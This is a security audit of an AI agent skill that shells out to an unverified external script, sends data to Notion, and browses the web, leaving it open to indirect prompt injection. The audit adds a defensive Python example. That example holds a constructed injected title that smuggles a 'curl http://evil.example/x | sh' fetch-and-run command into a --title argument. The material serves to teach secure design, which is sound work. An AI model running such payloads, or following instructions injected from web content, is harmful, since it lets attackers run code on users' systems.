Gen Agent Trust Hub audit: skills/atxinsky/skills/research

Skill: research

Audit result: Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGH
Findings: COMMAND_EXECUTION, REMOTE_CODE_EXECUTION, DATA_EXFILTRATION
Full Analysis
  • COMMAND_EXECUTION (HIGH): The skill instructions mandate running shell commands, specifically python to run a script and rm to delete a temporary file. This lets the agent execute code on the host system, using hardcoded paths.
  • REMOTE_CODE_EXECUTION (HIGH): The skill depends on an unverified script outside the skill package, at the hardcoded path C:\Users\atxin\.claude\skills\notion-save-skill\scripts\save_to_notion.py. Executing scripts that are neither part of the core skill package nor from a trusted, verifiable source is high-risk behaviour: whatever that file contains at run time executes with the agent's privileges.
  • DATA_EXFILTRATION (MEDIUM): The skill is designed to send potentially sensitive research data to an external service (Notion), authenticating with an API key read from an environment variable.
  • INDIRECT PROMPT INJECTION (HIGH): The skill requires the agent to browse the internet for "latest data and news". Because the agent also has file-writing and command-execution capabilities, malicious content on external websites could inject instructions that alter the report content or the arguments passed to the shell commands (for example the --title parameter), leading to unauthorized actions.
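The COMMAND_EXECUTION and INDIRECT PROMPT INJECTION findings together describe one concrete failure mode: a web-derived --title value reaching a shell command, and a script at a hardcoded path being run without anyone checking what is in it. The block below is an added example written for this audit page; it is not code from the audited skill, from the notion-save-skill script, or from Gen Agent Trust Hub. It shows the vulnerable string-splicing pattern next to a hardened one (argv list with no shell, title validation, and a hash pin on the external script). The stand-in script, the injected title, the temporary paths and the pinned hash are all constructed for the demonstration; the real save_to_notion.py is not reproduced.

```python
"""Guarding the shell-out described in the audit.

Added example, not code from the audited skill or from Gen Agent Trust Hub.
It models the audit's finding: a --title value derived from web content is
passed to a python script invoked from the shell. The stand-in script, the
paths and the pinned hash below are constructed for the demonstration; the
real save_to_notion.py is not reproduced here.
"""
import hashlib
import json
import os
import re
import shlex
import subprocess
import sys
import tempfile

MAX_TITLE_LEN = 200
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")  # newlines, NUL, escapes

# Constructed attacker-controlled title, e.g. scraped from a page heading.
INJECTED_TITLE = 'Weekly report"; curl http://evil.example/x | sh; echo "'

# Constructed stand-in for save_to_notion.py: echoes its argv as JSON
# instead of talking to Notion, so the example runs offline.
STAND_IN_SCRIPT = "import sys, json\nprint(json.dumps(sys.argv[1:]))\n"


def vulnerable_command(script_path, title):
    """The pattern the audit warns about: the title is spliced into one shell
    string. Returned rather than executed so it can be inspected safely."""
    return f'python {script_path} --title "{title}"'


def shell_words(command):
    """Tokenise a shell string the way a POSIX shell would (quotes honoured)."""
    return shlex.split(command)


def title_rejection(title):
    """Return None if the title is safe to pass as one argument, else a reason."""
    if not isinstance(title, str) or not title.strip():
        return "empty title"
    if len(title) > MAX_TITLE_LEN:
        return "title too long"
    if CONTROL_CHARS.search(title):
        return "control character in title"
    if title.lstrip().startswith("-"):
        return "title would be parsed as an option"
    return None


def hardened_argv(script_path, title):
    """Build argv with no shell: the title travels as exactly one element."""
    reason = title_rejection(title)
    if reason:
        raise ValueError(reason)
    return [sys.executable, script_path, "--title", title]


def sha256_file(path):
    """SHA-256 of a file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def run_save(script_path, title, pinned_sha256):
    """Run the external script only if it still matches the reviewed hash."""
    actual = sha256_file(script_path)
    if actual != pinned_sha256:
        raise RuntimeError(f"refusing to run {script_path}: hash {actual}")
    proc = subprocess.run(hardened_argv(script_path, title),
                          capture_output=True, text=True, check=True, timeout=30)
    return proc.stdout.strip()


def demo():
    """Exercise the hardened path with the injected title, then tamper."""
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, "save_to_notion.py")
        with open(script, "w") as f:
            f.write(STAND_IN_SCRIPT)
        pinned = sha256_file(script)  # recorded when the script was reviewed
        argv_seen = json.loads(run_save(script, INJECTED_TITLE, pinned))
        with open(script, "a") as f:  # simulate the script changing on disk
            f.write("import os  # tampered\n")
        try:
            run_save(script, INJECTED_TITLE, pinned)
            refused = False
        except RuntimeError:
            refused = True
    return {"argv": argv_seen, "tampered_refused": refused}


if __name__ == "__main__":
    print(vulnerable_command("save_to_notion.py", INJECTED_TITLE))
    print(demo())
```

Two things are worth noticing when running it. Tokenising the vulnerable string with shell_words shows `curl` appearing as its own word, which is exactly what a shell would execute; the hardened argv carries the same injected title as a single element, so the stand-in script simply receives it as data. The hash pin does not make the external script safe, it only guarantees that the file executed is the one that was reviewed, which is the check the REMOTE_CODE_EXECUTION finding is asking for.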
Recommendations
  • AI detected serious security threats. Do not enable this skill until the findings above are addressed: review the script at the hardcoded path before the skill can run it, and keep web-derived content out of the arguments passed to shell commands.
Audit Metadata
Risk Level: HIGH
Analyzed: Feb 16, 2026, 04:34 AM